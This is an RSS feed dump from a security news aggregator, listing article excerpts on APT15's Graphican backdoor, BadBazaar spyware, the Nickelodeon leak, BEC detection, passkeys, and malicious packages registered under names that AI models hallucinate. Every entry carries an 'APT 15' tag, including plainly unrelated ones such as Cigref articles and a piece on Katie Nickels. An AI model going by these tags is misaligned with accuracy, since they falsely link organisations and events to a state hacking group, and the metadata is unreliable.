www.secnews.physaphae.fr. This is the RSS 2.0 feed from www.secnews.physaphae.fr. It is a simple aggregated flow of multiple article sources; the list of sources can be found on www.secnews.physaphae.fr. Feed last built: 2024-05-13T19:47:05+00:00.

Trusted cloud: Cigref's environmental vision (Silicon, French news site; 2023-10-24T08:07:41+00:00)
https://www.silicon.fr/cloud-confiance-vision-environnementale-cigref-472634.html | www.secnews.physaphae.fr/article.php?IdArticle=8399611
Tags: Cloud; APT 15

IT careers, Scrum Master: role, training and salary (Silicon, French news site; 2023-10-20T10:19:43+00:00)
https://www.silicon.fr/metiers-it-scrum-master-fonction-formation-et-salaire-472576.html | www.secnews.physaphae.fr/article.php?IdArticle=8398212
Tags: APT 15

Smishing Triad Threat Actor Sets Its Sights on the UAE (knowbe4, cybersecurity services; 2023-10-10T20:05:50+00:00)
Resecurity warns that the Smishing Triad threat actor has "vastly expanded its attack footprint" in the United Arab Emirates (UAE).
https://blog.knowbe4.com/smishing-triad-sets-its-sights-on-uae | www.secnews.physaphae.fr/article.php?IdArticle=8393944
Tags: Threat; APT 15
An espionage group aligned with Chinese interests impersonating Signal and Telegram (Data Security Breach, French news site; 2023-09-01T13:43:32+00:00)
https://www.datasecuritybreach.fr/apt-gref/ | www.secnews.physaphae.fr/article.php?IdArticle=8377844
Tags: Tool; APT 15

ESET discovers an espionage group aligned with Chinese interests impersonating the Signal and Telegram apps (Global Security Mag, French news site; 2023-08-31T09:18:59+00:00)
Category: Malware
https://www.globalsecuritymag.fr/ESET-decouvre-un-groupe-d-espionnage-aligne-avec-les-interets-chinois-usurpant.html | www.secnews.physaphae.fr/article.php?IdArticle=8377106
Tags: Malware; APT 15

China-Linked BadBazaar Android Spyware Targeting Signal and Telegram Users (The Hacker News, a hacking news blog, surprisingly enough; 2023-08-30T19:13:00+00:00)
Cybersecurity researchers have discovered malicious Android apps for Signal and Telegram distributed via the Google Play Store and Samsung Galaxy Store that are engineered to deliver the BadBazaar spyware on infected devices. Slovakian company ESET attributed the campaign to a China-linked actor called GREF. "Most likely active since July 2020 and since July 2022, respectively, the campaigns
https://thehackernews.com/2023/08/china-linked-badbazaar-android-spyware.html | www.secnews.physaphae.fr/article.php?IdArticle=8376758
Tags: APT 15

Chinese APT Group GREF Use BadBazaar in Android Espionage (InfoSecurity Magazine; 2023-08-30T16:00:00+00:00)
ESET said BadBazaar was available via the Google Play Store, Samsung Galaxy Store and various app sites.
https://www.infosecurity-magazine.com/news/chinese-gref-target-badbazaar/ | www.secnews.physaphae.fr/article.php?IdArticle=8376774
Tags: APT 15

Trojanized Signal and Telegram apps on Google Play delivered spyware (Bleeping Computer, American magazine; 2023-08-30T11:16:48+00:00)
Trojanized Signal and Telegram apps containing the BadBazaar spyware were uploaded onto Google Play and Samsung Galaxy Store by a Chinese APT hacking group known as GREF. [...]
https://www.bleepingcomputer.com/news/security/trojanized-signal-and-telegram-apps-on-google-play-delivered-spyware/ | www.secnews.physaphae.fr/article.php?IdArticle=8376772
Tags: APT 15

BadBazaar espionage tool targets Android users via trojanized Signal and Telegram apps (We Live Security, ESET antivirus software vendor; 2023-08-30T09:30:18+00:00)
ESET researchers have discovered active campaigns linked to the China-aligned APT group known as GREF, distributing espionage code that has previously targeted Uyghurs.
https://www.welivesecurity.com/en/eset-research/badbazaar-espionage-tool-targets-android-users-trojanized-signal-telegram-apps/ | www.secnews.physaphae.fr/article.php?IdArticle=8382224
Tags: Tool; APT 15

Threat Trend Report on APT Groups – June 2023 (AhnLab, Korean security firm; 2023-08-16T06:46:45+00:00)
APT Group Trends – June 2023: 1) Andariel 2) APT28 3) Cadet Blizzard (DEV-0586) 4) Camaro Dragon 5) Charming Kitten (Mint Sandstorm) 6) Gamaredon (Shuckworm) 7) Ke3chang (APT15, Nickel) 8) Kimsuky 9) Lazarus 10) Muddy Water 11) Mustang Panda 12) OceanLotus 13) Patchwork (White Elephant) 14) Red Eyes (APT37) 15) Sharp Panda 16) SideCopy 17) Stealth Soldier. Report file: ATIP_2023_Jun_Threat Trend Report on APT Groups.
https://asec.ahnlab.com/en/56195/ | www.secnews.physaphae.fr/article.php?IdArticle=8370575
Tags: Threat, Prediction; APT 38, APT 35, APT 25, APT 32, APT 37, APT 15, APT 28
Code Mirage: How cyber criminals harness AI-hallucinated code for malicious machinations (AlienVault Lab Blog, AlienVault is a major defensive player in IOCs; 2023-08-02T10:00:00+00:00)
AI hallucinations: Artificial intelligence (AI) hallucinations, as described [2], refer to confident responses generated by AI systems that lack justification based on their training data. Similar to human psychological hallucinations, AI hallucinations involve the AI system providing information or responses that are not supported by the available data. However, in the context of AI, hallucinations are associated with unjustified responses or beliefs rather than false percepts. This phenomenon gained attention around 2022 with the introduction of large language models like ChatGPT, where users observed instances of seemingly random but plausible-sounding falsehoods being generated. By 2023, it was acknowledged that frequent hallucinations in AI systems posed a significant challenge for the field of language models.
The exploitative process: Cybercriminals begin by deliberately publishing malicious packages under commonly hallucinated names produced by large language models (LLMs) such as ChatGPT within trusted repositories. These package names closely resemble legitimate and widely used libraries or utilities, such as the legitimate package 'arangojs' vs the hallucinated package 'arangodb', as shown in the research done by Vulcan [1].
The trap unfolds: When developers, unaware of the malicious intent, use AI-based tools or large language models (LLMs) to generate code snippets for their projects, they can inadvertently fall into a trap. The AI-generated code snippets can include imaginary unpublished libraries, enabling cybercriminals to publish packages under the commonly hallucinated names. As a result, developers unknowingly import malicious packages into their projects, introducing vulnerabilities, backdoors, or other malicious functionality that compromises the security and integrity of the software and possibly other projects.
Implications for developers: The exploitation of AI-generated hallucinated package names poses significant risks to developers and their projects. Here are some key implications:
Trusting familiar package names: Developers commonly rely on package names they recognize to introduce code snippets into their projects. The presence of malicious packages under commonly hallucinated names makes it increasingly difficult to distinguish between legitimate and malicious options when relying on the trust placed in AI-generated code.
Blind trust in AI-generated code: Many develo
https://cybersecurity.att.com/blogs/security-essentials/code-mirage-how-cyber-criminals-harness-ai-hallucinated-code-for-malicious-machinations | www.secnews.physaphae.fr/article.php?IdArticle=8364676
Tags: Tool; ChatGPT, APT 15

Generative AI: Cigref's tips (Silicon, French news site; 2023-07-19T16:09:41+00:00)
https://www.silicon.fr/ia-generative-cigref-470181.html | www.secnews.physaphae.fr/article.php?IdArticle=8358883
Tags: APT 15

Twitter User Exposes Nickelodeon Data Leak (InfoSecurity Magazine; 2023-07-07T16:00:00+00:00)
Social media reports suggest an individual allegedly dumped approximately 500GB of animation files.
https://www.infosecurity-magazine.com/news/twitter-user-exposes-nickelodeon/ | www.secnews.physaphae.fr/article.php?IdArticle=8353400
Tags: APT 15

Nickelodeon probes claims of massive data leak as SpongeBob fans rejoice (The Register, English news site; 2023-07-06T22:45:12+00:00)
TV network's attorneys 'on a DMCA rampage' ... are you sure you're ready, kids? Nickelodeon says it is probing claims that "decades old" material was stolen from it and leaked online. This follows reports on social media that someone had dumped 500GB of snatched animation files. Hilarity, and many SpongeBob SquarePants memes, ensued. …
https://go.theregister.com/feed/www.theregister.com/2023/07/06/nickelodeon_confirms_data_leak/ | www.secnews.physaphae.fr/article.php?IdArticle=8353174
Tags: APT 15

Nickelodeon says some of allegedly stolen data 'appears to be decades old' (Recorded Future, Recorded Future feed; 2023-07-06T19:11:00+00:00)
Children's television giant Nickelodeon said it is investigating an alleged breach after hackers claimed to have stolen 500 GB of data. For days, cybersecurity experts have warned that hackers are sharing stolen documents from the network that included leaks from the Nickelodeon animation department. Some of the information allegedly dates back decades. [Screenshots of the
https://therecord.media/nickelodeon-alleged-data-breach | www.secnews.physaphae.fr/article.php?IdArticle=8353124
Tags: APT 15
Nickelodeon investigates breach after leak of 'decades old' data (Bleeping Computer, American magazine; 2023-07-06T11:03:36+00:00)
Nickelodeon has confirmed that the data leaked from an alleged breach of the company is legitimate, but it appears to be decades old. [...]
https://www.bleepingcomputer.com/news/security/nickelodeon-investigates-breach-after-leak-of-decades-old-data/ | www.secnews.physaphae.fr/article.php?IdArticle=8352923
Tags: APT 15

CyberheistNews Vol 13 #26 [Eyes Open] The FTC Reveals the Latest Top Five Text Message Scams (knowbe4, cybersecurity services; 2023-06-27T13:00:00+00:00)
CyberheistNews Vol 13 #26 | June 27th, 2023
[Eyes Open] The FTC Reveals the Latest Top Five Text Message Scams
The U.S. Federal Trade Commission (FTC) has published a data spotlight outlining the most common text message scams. Phony bank fraud prevention alerts were the most common type of text scam last year. "Reports about texts impersonating banks are up nearly tenfold since 2019 with median reported individual losses of $3,000 last year," the report says.
These are the top five text scams reported by the FTC:
1. Copycat bank fraud prevention alerts
2. Bogus "gifts" that can cost you
3. Fake package delivery problems
4. Phony job offers
5. Not-really-from-Amazon security alerts
"People get a text supposedly from a bank asking them to call a number ASAP about suspicious activity or to reply YES or NO to verify whether a transaction was authorized. If they reply, they'll get a call from a phony 'fraud department' claiming they want to 'help get your money back.' What they really want to do is make unauthorized transfers.
"What's more, they may ask for personal information like Social Security numbers, setting people up for possible identity theft."
Fake gift card offers took second place, followed by phony package delivery problems. "Scammers understand how our shopping habits have changed and have updated their sleazy tactics accordingly," the FTC says. "People may get a text pretending to be from the U.S. Postal Service, FedEx, or UPS claiming there's a problem with a delivery.
"The text links to a convincing-looking – but utterly bogus – website that asks for a credit card number to cover a small 'redelivery fee.'"
Scammers also target job seekers with bogus job offers in an attempt to steal their money and personal information. "With workplaces in transition, some scammers are using texts to perpetrate old-school forms of fraud – for example, fake 'mystery shopper' jobs or bogus money-making offers for driving around with cars wrapped in ads," the report says.
"Other texts target people who post their resumes on employment websites. They claim to offer jobs and even send job seekers checks, usually with instructions to send some of the money to a different address for materials, training, or the like. By the time the check bounces, the person's money – and the phony 'employer' – are long gone."
Finally, scammers impersonate Amazon and send fake security alerts to trick victims into sending money. "People may get what looks like a message from 'Amazon,' asking to verify a big-ticket order they didn't place," the FTC says. "Concerned
https://blog.knowbe4.com/cyberheistnews-vol-13-26-eyes-open-the-ftc-reveals-the-latest-top-five-text-message-scams | www.secnews.physaphae.fr/article.php?IdArticle=8349704
Tags: Ransomware, Spam, Malware, Hack, Tool, Threat; ChatGPT, APT 15, APT 28, FedEx

CISOs Increasingly Concerned About Mobile Threats (SlashNext, cyber firm; 2023-06-23T21:30:46+00:00)
With a new warning from Verizon about the rise of smishing, spam text messages and text scams, and the FBI reporting $10.3 billion in internet fraud last year, CISOs are increasingly concerned about mobile threats targeting employees and the impact on their organization. The rise of smishing, spam text messages and text scams. In a recent survey […] The post CISOs Increasingly Concerned About Mobile Threats first appeared on SlashNext.
https://slashnext.com/blog/cisos-increasingly-concerned-about-mobile-threats/ | www.secnews.physaphae.fr/article.php?IdArticle=8386745
Tags: Spam; APT 15
20-Year-Old Chinese APT15 Finds New Life in Foreign Ministry Attacks (Dark Reading, Informationweek branch; 2023-06-21T21:35:00+00:00)
The notorious APT15 used common malware tools and a third-generation custom "Graphican" backdoor to continue its information-gathering exploits, this time against foreign ministries.
https://www.darkreading.com/vulnerabilities-threats/20-year-old-chinese-apt15-new-life-foreign-ministry-attacks | www.secnews.physaphae.fr/article.php?IdArticle=8347850
Tags: Malware; APT 15

Experienced China-based hacking group has new backdoor tool, researchers say (Recorded Future, Recorded Future feed; 2023-06-21T17:13:00+00:00)
The Chinese cyber-espionage group known as Nickel or APT15 used a previously unseen backdoor to attack ministries of foreign affairs in Central and South America, researchers reported Wednesday. In the campaign that ran from late 2022 into early 2023, hackers targeted a government finance department and an unnamed corporation as well as the foreign affairs
https://therecord.media/apt15-nickel-graphican-backdoor | www.secnews.physaphae.fr/article.php?IdArticle=8347784
Tags: APT 15
Chinese APT15 hackers resurface with new Graphican malware (Bleeping Computer, American magazine; 2023-06-21T06:00:00+00:00)
The Chinese state-sponsored hacking group tracked as APT15 has been observed using a novel backdoor named 'Graphican' in a new campaign between late 2022 and early 2023. [...]
https://www.bleepingcomputer.com/news/security/chinese-apt15-hackers-resurface-with-new-graphican-malware/ | www.secnews.physaphae.fr/article.php?IdArticle=8347642
Tags: Malware; APT 15

Some keys to analysing the performance of IT departments (Silicon, French news site; 2023-06-20T08:37:46+00:00)
https://www.silicon.fr/cigref-performance-dsi-468130.html | www.secnews.physaphae.fr/article.php?IdArticle=8347228
Tags: APT 15

CSR and IT projects: Cigref pushes a scoring tool (Silicon, French news site; 2023-05-29T09:42:08+00:00)
https://www.silicon.fr/cigref-scoring-rse-projets-it-466305.html | www.secnews.physaphae.fr/article.php?IdArticle=8340178
Tags: APT 15

Release: Harita Group (510 GB) (DDoSecrets, security blog: Distributed Email of Secrets; 2023-05-17T07:28:14+00:00)
Emails from the Indonesian conglomerate involved in nickel, coal, and bauxite mining, ferronickel smelters, alumina refineries, logging, and palm oil plantations.
https://ddosecrets.substack.com/p/release-harita-group-510-gb | www.secnews.physaphae.fr/article.php?IdArticle=8337280
Tags: APT 15

Making authentication faster than ever: passkeys vs. passwords (GoogleSec, firm security blog; 2023-05-05T12:00:43+00:00)
Google announced its next step toward a passwordless future: passkeys. Passkeys are a new, passwordless authentication method that offers a convenient authentication experience for sites and apps, using just a fingerprint, face scan or other screen lock. They are designed to enhance online security for users. Because they are based on the public key cryptographic protocols that underpin security keys, they are resistant to phishing and other online attacks, making them more secure than SMS, app-based one-time passwords and other forms of multi-factor authentication (MFA). And since passkeys are standardized, a single implementation enables a passwordless experience across browsers and operating systems.
Passkeys can be used in two different ways: on the same device or from a different device. For example, if you need to sign in to a website on an Android device and you have a passkey stored on that same device, then using it only involves unlocking the phone. On the other hand, if you need to sign in to that website in the Chrome browser on your computer, you simply scan a QR code to connect the phone and computer to use the passkey.
The technology behind the former ("same device passkey") is not new: it was originally developed within the FIDO Alliance and first implemented by Google in August 2019 in select flows. Google and other FIDO members have been working together on enhancing the underlying technology of passkeys over the last few years to improve their usability and convenience. The technology behind passkeys allows users to log in to their account using any form of device-based user verification, such as biometrics or a PIN code. A credential is only registered once on a user's personal device, and then the device proves possession of the registered credential to the remote server by asking the user to use their device's screen lock. The user's biometric, or other screen lock data, is never sent to Google's servers; it stays securely stored on the device, and only cryptographic proof that the user has correctly provided it is sent to Google. Passkeys are also created and stored on your devices and are not sent to websites or apps. If you create a passkey on one device, the Google Password Manager can make it available on your other devices that are signed into the same system account.
Learn more on how passkey works under the hoo
http://security.googleblog.com/2023/05/making-authentication-faster-than-ever.html | www.secnews.physaphae.fr/article.php?IdArticle=8333804
Tags: APT 38, APT 10, APT 15, Guam

Microsoft recognizes Katie Nickels for her impact on the security community (RedCanary, Red Canary; 2023-04-26T16:11:23+00:00)
Microsoft has awarded Red Canary's Director of Intelligence Operations its Security Changemaker award at its 2023 Security Excellence Awards.
https://redcanary.com/blog/katie-nickels-microsoft-security-award/ | www.secnews.physaphae.fr/article.php?IdArticle=8331282
Tags: APT 15

Ransomware attack that forced a New York county back to pen and paper began in 2021, official says (Recorded Future, Recorded Future feed; 2023-04-12T23:37:00+00:00)
New York's Suffolk County has concluded an investigation into a destabilizing ransomware attack that forced government workers to rely on fax machines and paper records, discovering stark deficiencies in the county clerk's cybersecurity practices. Suffolk County Executive Steven Bellone held a press conference (https://www.facebook.com/SteveBellone/videos/550329996987344/) Wednesday to unveil the findings of the forensic investigation into the September
https://therecord.media/suffolk-county-new-york-ransomware-investigation | www.secnews.physaphae.fr/article.php?IdArticle=8327274
Tags: Ransomware; APT 15
Silicon - Site de News Francais Gestion de crise cyber : l\'approche du Cigref en 7 chiffres 2023-02-22T16:34:23+00:00 https://www.silicon.fr/gestion-crise-cyber-approche-cigref-7-chiffres-458946.html www.secnews.physaphae.fr/article.php?IdArticle=8312524 False None APT 15 3.0000000000000000 Silicon - Site de News Francais Métiers IT : " la technologie a besoin de femmes " 2023-02-20T16:33:54+00:00 https://www.silicon.fr/metiers-it-technologie-femmes-458752.html www.secnews.physaphae.fr/article.php?IdArticle=8311921 False None APT 15 2.0000000000000000 InfoSecurity Mag - InfoSecurity Magazine EU Cybersecurity Agency Warns Against Chinese APTs 2023-02-17T17:00:00+00:00 https://www.infosecurity-magazine.com/news/eu-warns-chinese-apts/ www.secnews.physaphae.fr/article.php?IdArticle=8311285 False None APT 25,APT 31,APT 15,APT 27,APT 30 2.0000000000000000 Global Security Mag - Site de news francais Fortinet enrichit son offre de services et de formations pour aider les équipes SOC à mieux anticiper et déjouer les cybermenaces Formations des Instituts privés et public]]> 2023-02-17T08:29:11+00:00 https://www.globalsecuritymag.fr/Fortinet-enrichit-son-offre-de-services-et-de-formations-pour-aider-les-equipes.html www.secnews.physaphae.fr/article.php?IdArticle=8311183 False None APT 15 2.0000000000000000 Anomali - Firm Blog Anomali Cyber Watch: Roaming Mantis Changes DNS on Wi-Fi Routers, Hook Android Banking Trojan Has Device Take-Over Capabilities, Ke3chang Targeted Iran with Updated Turian Backdoor Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed. Trending Cyber News and Threat Intelligence Roaming Mantis Implements New DNS Changer in Its Malicious Mobile App in 2022 (published: January 19, 2023) In December 2022, a financially-motivated group dubbed Roaming Mantis (Shaoye) continued targeting mobile users with malicious landing pages. 
iOS users were redirected to phishing pages, while Android users were provided with malicious APK files detected as XLoader (Wroba, Moqhao). Japan, Austria, France, and Germany were the most targeted for XLoader downloads (in that order). All but one targeted country had smishing as an initial vector. In South Korea, Roaming Mantis implemented a new DNS changer function. XLoader-infected Android devices were targeting specific Wi-Fi routers used mostly in South Korea. The malware would compromise routers with default credentials and change the DNS settings to serve malicious landing pages from legitimate domains. Analyst Comment: The XLoader DNS changer function is especially dangerous in the context of free/public Wi-Fi that serve many devices. Install anti-virus software for your mobile device. Users should be cautious when receiving messages with a link or unwarranted prompts to install software. MITRE ATT&CK: [MITRE ATT&CK] T1078.001 - Valid Accounts: Default Accounts | [MITRE ATT&CK] T1584 - Compromise Infrastructure Tags: actor:Roaming Mantis, actor:Shaoye, file-type:APK, detection:Wroba, detection:Moqhao, detection:XLoader, malware-type:Trojan-Dropper, DNS changer, Wi-Fi routers, ipTIME, EFM Networks, Title router, DNS hijacking, Malicious app, Smishing, South Korea, target-country:KR, Japan, target-country:JP, Austria, target-country:AT, France, target-country:FR, Germany, target-country:DE, VK, Mobile, Android Hook: a New Ermac Fork with RAT Capabilities (published: January 19, 2023) ThreatFabric researchers analyzed a new Android banking trojan named Hook. It is a rebranded development of the Ermac malware that was based on the Android banker Cerberus. Hook added new capabilities in targeting banking and cryptocurrency-related applications. The malware also added capabilities of a remote access trojan and a spyware. 
Its device take-over capabilities include being able to remotely view and interact with the screen of the infected device, manipulate files on the devices file system, simulate clicks, fill text boxes, and perform gestures. Hook can start the social messaging application WhatsApp, extract all the messages present, and send new ones. Analyst Comment: Users should take their mobile device security seriously whether they use it for social messaging or actually provide access to their banking accounts and/or cryptocurrency holdings. Similar to its predecessors, Hook will likely be used by many threat actors (malware-as-as-service model). It means the need to protect from a wide range of attacks: smishing, prompts to install malicious apps, excessive]]> 2023-01-24T16:30:00+00:00 https://www.anomali.com/blog/anomali-cyber-watch-roaming-mantis-changes-dns-on-wi-fi-routers-hook-android-banking-trojan-has-device-take-over-capabilities-ke3chang-targeted-iran-with-updated-turian-backdoor www.secnews.physaphae.fr/article.php?IdArticle=8303740 False Malware,Tool,Threat,Guideline APT 25,APT 15 3.0000000000000000 CSO - CSO Daily Dashboard Chinese hackers targeted Iranian government entities for months: Report Palo Alto Networks report. The Chinese threat actor also known as APT15, KeChang, NICKEL, BackdoorDiplomacy, and Vixen Panda, was observed attempting to connect government domains to malware infrastructure previously associated with the APT group, according to the report.“Playful Taurus continues to evolve their tactics and their tooling. Recent upgrades to the Turian backdoor and new C2 infrastructure suggest that these actors continue to see success during their cyber espionage campaigns,” Palo Alto Networks said in a blog. 
To read this article in full, please click here]]> 2023-01-19T04:27:00+00:00 https://www.csoonline.com/article/3686088/chinese-hackers-targeted-iranian-government-entities-for-months-report.html#tk.rss_all www.secnews.physaphae.fr/article.php?IdArticle=8302529 False Malware,Threat APT 25,APT 15 3.0000000000000000 InfoSecurity Mag - InfoSecurity Magazine Chinese APT Group Vixen Panda Targets Iranian Government Entities 2023-01-18T18:00:00+00:00 https://www.infosecurity-magazine.com/news/chinese-apt-group-vixen-panda/ www.secnews.physaphae.fr/article.php?IdArticle=8302416 False None APT 25,APT 15 3.0000000000000000 Silicon - Site de News Francais Low-code : Enedis, Pierre Fabre et la STIME témoignent 2023-01-09T10:58:20+00:00 https://www.silicon.fr/low-code-enedis-pierre-fabre-stime-temoignent-455846.html www.secnews.physaphae.fr/article.php?IdArticle=8299144 False None APT 15 2.0000000000000000 Silicon - Site de News Francais Low-code : le Cigref pose la question des coûts 2023-01-09T09:34:59+00:00 https://www.silicon.fr/low-code-cigref-question-couts-455839.html www.secnews.physaphae.fr/article.php?IdArticle=8299130 False None APT 15 2.0000000000000000 InfoSecurity Mag - InfoSecurity Magazine Cobalt Mirage Affiliate Uses GitHub to Relay Drokbk Malware Instructions 2022-12-09T16:00:00+00:00 https://www.infosecurity-magazine.com/news/iranian-hacker-uses-github-to/ www.secnews.physaphae.fr/article.php?IdArticle=8289582 False Malware APT 15 3.0000000000000000 Global Security Mag - Site de news francais Un groupe soutenu par l\'Iran utilise Github pour relayer les instructions de logiciels malveillants Malwares]]> 2022-12-09T11:17:25+00:00 https://www.globalsecuritymag.fr/Un-groupe-soutenu-par-l-Iran-utilise-Github-pour-relayer-les-instructions-de.html www.secnews.physaphae.fr/article.php?IdArticle=8289522 False Malware APT 15 2.0000000000000000 SecureWork - SecureWork: incident response Drokbk Malware Uses GitHub as Dead Drop Resolver 2022-12-09T04:00:00+00:00 
https://www.secureworks.com/blog/drokbk-malware-uses-github-as-dead-drop-resolver www.secnews.physaphae.fr/article.php?IdArticle=8289504 False Malware,Threat APT 15 2.0000000000000000

[Silicon - French news site] Machine learning: a bit of TensorFlow in Google Sheets
2022-12-08T15:27:58+00:00 https://www.silicon.fr/machine-learning-tensorflow-google-sheets-454628.html www.secnews.physaphae.fr/article.php?IdArticle=8289147 False None APT 15 2.0000000000000000

[CVE Liste - Common Vulnerability Exposure] CVE-2022-46770
2022-12-07T20:15:11+00:00 https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-46770 www.secnews.physaphae.fr/article.php?IdArticle=8288886 False None APT 15 None

[Silicon - French news site] CSR: what role for CIOs?
2022-11-29T08:46:30+00:00 https://www.silicon.fr/rse-positionnement-dsi-453513.html www.secnews.physaphae.fr/article.php?IdArticle=8277891 False General Information APT 15 3.0000000000000000

[Silicon - French news site] Energy crisis: Cigref's suggestions for digital departments
2022-11-07T08:46:21+00:00 https://www.silicon.fr/crise-energetique-pistes-cigref-directions-numeriques-451957.html www.secnews.physaphae.fr/article.php?IdArticle=7879100 False None APT 15 None

[Silicon - French news site] From low-code to the metaverse: Cigref's projections
2022-10-18T15:36:10+00:00 https://www.silicon.fr/low-code-metavers-projections-cigref-450377.html www.secnews.physaphae.fr/article.php?IdArticle=7542509 False None APT 15 None

[CISCO Talos - Cisco Research blog] The benefits of taking an intent-based approach to detecting Business Email Compromise
By Abhishek Singh. BEC is a multi-stage attack. Adversaries first identify targets, then they establish rapport with the victim before exploiting them for whatever their end goal is. In the case of BEC, a threat actor can impersonate any employee in the organization to trick targets.
A policy that checks for authorized email addresses of the sender can prevent BEC attacks. However, scaling the approach for every employee in a large organization is a challenge. Building an executive profile based on email analysis using a machine learning model and scanning emails against that profile will detect BEC. Data collection for building and training machine learning algorithms can take time, though, opening a window of opportunity for threat actors to exploit. Detection of exploitation techniques such as lookalike domains and any differences in the email addresses in the "From" and "Reply-to" fields can also detect BEC messages. However, the final verdict cannot account for the threat actor's intent.
The intent-based approach detects BEC and then classifies it into the type of scam. It catches BEC messages irrespective of whether a threat actor is impersonating a C-level executive or any other employee in an organization. Classification based on the type of scam can help identify which segment of an organization was targeted and which employees were being impersonated by the threat actor. The additional information will further assist in better designing preventive features to stop BEC.
Business email compromise (BEC) is one of the most financially damaging online crimes. As per the 2021 Internet Crime Report, the total loss in 2021 due to BEC is around 2.4 billion dollars. Since 2013, BEC has resulted in a 43 billion dollar loss. The report defines BEC as a scam targeting businesses (not individuals) working with foreign suppliers and companies regularly performing wire transfer payments. Fraudsters carry out these sophisticated scams to conduct the unauthorized transfer of funds. This introduces the challenge of how to detect and block these campaigns as they continue to compromise organizations successfully.
There are a variety of approaches to identifying BEC email messages, such as using policy to allow emails from authorized email addresses, detecting exploitation techniques used by threat actors, building profiles by analysis of emails, and validating against the profile to detect BEC. These approaches have a variety of limitations or shortcomings. Cisco Talos is taking a different approach and using an intent-based model to identify and block BEC messages. Before we get too deep into the intent-based model, let's take a closer look at the commonly used approaches to block BEC, from the simplistic through machine learning (ML) approaches.
Policy-based detection
The first place to start is with policy-based detection, as it is one of the most common and simplistic approaches to blocking BEC campaigns. Let's start by looking at an example of a BEC email.
2022-10-18T08:41:18+00:00 http://blog.talosintelligence.com/2022/10/the-benefits-of-taking-intent-based.html www.secnews.physaphae.fr/article.php?IdArticle=7540074 False Threat,Medical,Cloud APT 38,APT 19,APT 29,APT 10,APT 37,Uber,APT 15,Yahoo None

[Anomali - Firm Blog] Anomali Cyber Watch: Uber and GTA 6 Were Breached, RedLine Bundle File Advertises Itself on YouTube, Supply-Chain Attack via eCommerce Fishpig Extensions, and More
Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed.
Trending Cyber News and Threat Intelligence
Hacker Pwns Uber Via Compromised VPN Account (published: September 16, 2022)
On September 15, 2022, ride-sharing giant Uber started an incident response after discovering a data breach. According to Group-IB researchers, download file name artifacts point to the attacker getting access to fresh keylogger logs affecting two Uber employees from Indonesia and Brazil that had been infected with the Racoon and Vidar stealers.
The attacker allegedly used compromised VPN account credentials and performed a multifactor authentication fatigue attack by requesting the MFA push notification many times and then making a social-engineering call to the affected employee. Once inside, the attacker allegedly found valid credentials for privilege escalation: a PowerShell script containing hardcoded credentials for a Thycotic privileged access management admin account. On September 18, 2022, Rockstar Games' Grand Theft Auto 6 suffered a confirmed data leak, likely caused by the same attacker.
Analyst Comment: Network defenders can consider setting up alerts for signs of an MFA fatigue attack, such as a large number of MFA requests in a relatively short period of time. Review your source code for embedded credentials, especially those with administrative privileges.
MITRE ATT&CK: [MITRE ATT&CK] Valid Accounts - T1078 | [MITRE ATT&CK] Credentials from Password Stores - T1555
Tags: MFA fatigue, Social engineering, Data breach, Uber, GTA 6, GTA VI, detection:Racoon, detection:Vidar, malware-type:Keylogger, malware-type:Stealer
Self-Spreading Stealer Attacks Gamers via YouTube (published: September 15, 2022)
Kaspersky researchers discovered a new campaign spreading the RedLine commodity stealer. This campaign utilizes a malicious bundle: a single self-extracting archive. The bundle delivers RedLine and additional malware, which enables spreading the malicious archive by publishing promotional videos on the victim's YouTube channel. These videos target gamers with promises of "cheats" and "cracks."
Analyst Comment: Kids and other online gamers should be reminded to avoid illegal software. It might be better to use different machines for your gaming and banking activities.
MITRE ATT&CK: [MITRE ATT&CK] User Execution - T1204 | [MITRE ATT&CK] Credentials from Password Stores - T1555 | [MITRE ATT&CK] Resource Hijacking - T1496
Tags: detection:RedLine, malware-type:Stealer, Bundle, Self-spreading, Telegraph, Youtub
2022-09-20T15:00:00+00:00 https://www.anomali.com/blog/anomali-cyber-watch-uber-and-gta-6-were-breached-redline-bundle-file-advertises-itself-on-youtube-supply-chain-attack-via-ecommerce-fishpig-extensions-and-more www.secnews.physaphae.fr/article.php?IdArticle=7016803 False Ransomware,Malware,Tool,Vulnerability,Threat,Guideline Uber,Uber,APT 15,APT 41 None

[Global Security Mag - French news site] 250,000 euro fine imposed on INFOGREFFE
GDPR
2022-09-13T09:53:05+00:00 http://www.globalsecuritymag.fr/Sanction-de-250-000-euros-a-l,20220913,129744.html www.secnews.physaphae.fr/article.php?IdArticle=6867504 False None APT 15 None

[Silicon - French news site] How Cigref sees IT professions evolving
2022-09-06T13:39:03+00:00 https://www.silicon.fr/cigref-evoluer-metiers-si-446406.html www.secnews.physaphae.fr/article.php?IdArticle=6750215 False None APT 15 None

[NoticeBored - Experienced IT Security professional] CISO workshop slides
A glossy, nicely-constructed and detailed PowerPoint slide deck by Microsoft Security caught my beady eye this morning. The title 'CISO Workshop: Security Program and Strategy' with 'Your Name Here' suggests it might be a template for use in a workshop/course bringing CISOs up to speed on the governance, strategic and architectural aspects of information security, but in fact, given the amount of technical detail, it appears to be aimed at informing IT/technology managers about IT or cybersecurity, specifically.
Maybe it is intended for newly-appointed CISOs or more junior managers who aspire to be CISOs, helping them clamber up the pyramid (slide 87 of 142):
2022-08-06T10:46:21+00:00 http://blog.noticebored.com/2022/08/a-glossy-nicely-constructed-and.html www.secnews.physaphae.fr/article.php?IdArticle=6150878 False Malware,Vulnerability,Threat,Patching,Guideline,Medical,Cloud APT 38,APT 19,APT 10,APT 37,Uber,APT 15,Guam,APT 28,APT 34 None

[01net. News - Security - French magazine] Meta has purged Facebook and Instagram of hundreds of Russian trolls paid to manipulate opinion
Hundreds of trolls based in Saint Petersburg were churning out pro-Russian comments on social networks. But in the end, the operation was of mediocre quality and not very effective.
2022-08-05T11:34:14+00:00 https://www.01net.com/actualites/meta-a-chasse-des-centaines-de-trolls-russes-aux-pieds-nickeles.html www.secnews.physaphae.fr/article.php?IdArticle=6141252 False None APT 15 None

[Silicon - French news site] Cloud: how to protect Europe from laws with extraterritorial reach
2022-06-28T11:03:27+00:00 https://www.silicon.fr/cloud-proteger-europe-loi-extraterritoriale-442355.html www.secnews.physaphae.fr/article.php?IdArticle=5486504 False None APT 15 None

[Silicon - French news site] Broadcom's acquisition of VMware: Cigref sounds the alarm
